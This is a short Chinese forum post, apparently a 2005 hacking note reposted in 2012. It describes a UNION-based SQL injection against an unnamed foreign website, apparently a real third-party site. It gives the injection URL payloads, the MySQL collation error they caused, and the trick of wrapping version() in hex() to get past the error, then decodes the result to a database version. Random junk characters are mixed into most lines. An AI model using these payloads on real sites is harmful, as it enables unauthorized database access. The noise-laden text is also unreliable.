本文作者:SuperHei' v, Y |4 m F3 _* Z
文章性质:原创
- B' ]; K: X0 b2 ]5 O0 W发布日期:2005-10-18" V( r' Y% ^7 F7 e" o4 }: l
测试个国外的站时:
7 ?0 d4 J# ?# ^url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*; m5 I3 v+ g: F; N+ @
返回错误:
- X9 e; }! q aIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
+ a2 B9 |" E" p/ fMySQL Error No. 126& q5 z6 s' p% E5 P1 `6 j# C) q6 c
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
3 i7 g% ^1 A" z( X1 L$ o解决办法:转为其他编码如hex。
+ ~2 Q# K4 }+ p2 `url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*: s: J3 |0 k+ @4 S) ^
成功得到hex(version())的值为:. A; @0 O6 O) v- s6 `& z+ W5 q" D8 i
342E312E332D62657461/ E: u# f, s; T6 S/ n* R; h1 l
回Mysql查询下得到:: P0 E0 j9 w% D
mysql> select 0x342E312E332D62657461;
g. p8 u/ m* C( F+ N1 s6 F, a+------------------------+( T% |9 u# A4 t, l7 H- t
| 0x342E312E332D62657461 |
9 Q( N1 z9 m8 y8 @, M# P6 \+------------------------+
& {# V9 x/ l' B4 ~0 Z3 H| 4.1.3-beta |8 I+ \" J! x4 ?$ W3 N
+------------------------+$ M$ X% P9 Y' u. u; ]0 R
1 row in set (0.00 sec)
5 v0 w% ~4 ^2 h' f
5 u3 t Z7 W$ ?) r |
发表于 2012-9-15 14:04:54
收藏
支持
反对